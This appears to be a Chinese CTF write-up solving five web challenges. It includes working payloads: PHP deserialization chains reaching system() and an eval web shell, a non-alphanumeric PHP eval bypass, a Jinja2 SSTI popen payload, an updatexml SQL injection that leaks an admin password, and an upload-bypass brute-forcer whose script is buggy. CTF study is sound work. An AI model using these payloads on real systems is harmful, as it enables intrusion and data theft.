兔年大吉

源码如下

<?phphighlight_file(__FILE__);error_reporting(0);class Happy{    private $cmd;    private $content;    public function __construct($cmd, $content)    {        $this->cmd = $cmd;        $this->content = $content;    }    public function __call($name, $arguments)    {        call_user_func($this->cmd, $this->content);    }    public function __wakeup()    {        die("Wishes can be fulfilled");    }}class Nevv{    private $happiness;    public function __invoke()    {        return $this->happiness->check();    }}class Rabbit{    private $aspiration;    public function __set($name,$val){        return $this->aspiration->family;    }}class Year{    public $key;    public $rabbit;    public function __construct($key)    {        $this->key = $key;    }    public function firecrackers()    {        return $this->rabbit->wish = "allkill QAQ";    }    public function __get($name)    {        $name = $this->rabbit;        $name();    }    public function __destruct()    {        if ($this->key == "happy new year") {            $this->firecrackers();        }else{            print("Welcome 2023!!!!!");        }    }}if (isset($_GET['pop'])) {    $a = unserialize($_GET['pop']);}else {    echo "过新年啊~过个吉祥年~";}?>

挺基础的一个反序列化,先找pop链:

Year::destruct -> Year::firecrackers() -> Rabbit::set-> Year::get-> Nevv::invoke -> Happy::call简单写一下代码:

<?phpclass Happy{    private $cmd;    private $content;    public function __construct($cmd, $content)    {        $this->cmd = $cmd;        $this->content = $content;    }}class Nevv{    private $happiness;    public function __construct($tmp)    {        $this->happiness = $tmp;    }}class Rabbit{    private $aspiration;    public function __construct($tmp)    {        $this->aspiration = $tmp;    }}class Year{    public $key = "happy new year";    public $rabbit;}$year = new Year;$year2 = new Year;$rabbit = new rabbit($year2);$year->rabbit = $rabbit;$happy = new Happy("system", "ls");$nevv = new Nevv($happy);$year2->rabbit = $nevv;echo urlencode(serialize($year));?>

直接打就行了

ezbypass

源码如下:

<?phperror_reporting(0);highlight_file(__FILE__);if (isset($_POST['code'])) {    $code = $_POST['code'];    if (strlen($code) <= 105){        if (is_string($code)) {            if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-\"|`~\\\\]/",$code)){                eval($code);            } else {                echo "Hacked!";            }        } else {            echo "You need to pass in a string";        }    } else {            echo "long?";    }}

可以看到该过滤的都过滤了,而且payload长度限制了105,这样我们可以想到利用php的自增特性来构造攻击代码

code=$_=(_/_._);$_=$_[''!=''];$%ff=%2b%2b$_;$%ff=%2b%2b$_.$%ff;$_%2b%2b;$_%2b%2b;$%ff.=%2b%2b$_;$%ff.=%2b%2b$_;$_=_.$%ff;$$_[_]($$_[__]);&_=system&__=cat /f*

这里解释一下,(_/_) 的输出为NaN,再拼接一个_就可以名正言顺的成为一个字符串,然后我们就可以取”N”通过++来构造出POST

其实这段payload还可以更短,有兴趣的读者可以自行研究 ,最终我们得到的是$_POST[_]($_POST[__]),这样就可以命令执行了。

ezupload源码如下:

<?php    @error_reporting(0);    date_default_timezone_set('America/Los_Angeles');    highlight_file(__FILE__);    if (isset($_POST['submit'])){        $file_name = trim($_FILES['upload_file']['name']);        $black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");        $file_ext = strrchr($file_name, '.');        $file_ext = strtolower($file_ext);        if (!in_array($file_ext, $black)){            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;            if (move_uploaded_file($temp_file, $img_path)) {                    $is_upload = true;            } else {                $msg = '上传出错!';            }        }else {            $msg = '你传啥玩意??';        }    }    if($is_upload){        echo '呀,(传)进去了欸~';    }?>

纸老虎,.php都没限制,就是date加随机数改了个文件名,我们可以在本地搭个一样的来得到文件名,然后往后爆破就能得到上传路径的文件了

这里注意手速一定要快,要不然要多爆破好久,检验代码如下:

import requestsurl = 'http://095468b8-416d-4ea2-9f71-cb0cb7ab617e.ctf.qsnctf.com:8080/upload/'for i in range('本地文件名', '比本地文件名大就行'):    urls = url + str(i) + ".php"    r = requests.get(url)    if r.status_code == 404:        continue    else:        print(q)

得到文件后,就是常规的getshell了。

SSTI

看页面源代码得到参数?SI,试了下{{1}},报违规字符了,说明{{是被限制了,我们利用{%print %}来绕过这个限制,这题很明显在考一系列的限制过滤

把关键的类都限制了,__class__之类的。我们这里利用jinjia2的特性[‘__clas”s__’]来绕过这个限制,后面的我不想测试,所以都写成这个样子,payload如下:

?SI={%print config['__cla''ss__']['__in''it__']['__glo''bals__']['os']['po''pen']('cat /g*').read()%}

还是挺简单的

ezphp

开局一个登录界面,加个单引号,直接有报错,很明显报错注入,中途的测试过程我就省略了,直接上最后的payload:

admin'/**/and/**/updatexml(1,(concat(0x7e,(selselectect/**/group_concat(Password)/**/from/**/admin),0x7e)),1)#

账号密码admin:0909876qwe222

我们登录进去,随便输点东西,得到源代码:

<?phpini_set('open_basedir',".");error_reporting(E_ALL^E_NOTICE^E_WARNING);session_start();if($_COOKIE['admin']!=md5('adminyyds')){    header('Location:/index.php');    exit();}echo('

WelCome!ADMin!!!

');echo('this is a site test pages for admin! ');if(isset($_POST['url'])){ echo file_get_contents($_POST['url']); show_source(__FILE__);}else{ echo(' url: ');}//x9sd.php?>

可以读文件,下面还给了hint

url=file:///var/www/html/x9sd.php
class a {    protected $cmd;    function __destruct()    {       echo $this->cmd;        @eval($this->cmd);            }}if(isset($_GET['username']) && isset($_GET['unserx'])){    $var = base64_decode($_GET['unserx']);               if($_GET['username'] === "admin"){        echo "nonono?";    }    $username = urldecode($_GET['username']);    if($username === "admin"){        unserialize($var);    }    unserialize($var);    echo("success");}else{    echo "I need some ???";}

有是一个反序列化,这个直接就是a了,都不用找链:

<?phpclass a {    protected $cmd;    function __construct($tmp)    {        $this->cmd = $tmp;    }}if(isset($_GET['username']) && isset($_GET['unserx'])){    $var = base64_decode($_GET['unserx']);               if($_GET['username'] === "admin"){        echo "nonono?";    }    $username = urldecode($_GET['username']);    if($username === "admin"){        unserialize($var);    }    unserialize($var);    echo("success");}else{    echo "I need some ???";}$a = new a('eval($_POST[1]);');echo base64_encode(serialize($a));?>

这样就getshell了

总结

web题不错,适合我这种新手做,这里抨击下ezmisc出题人,以后别这么出了。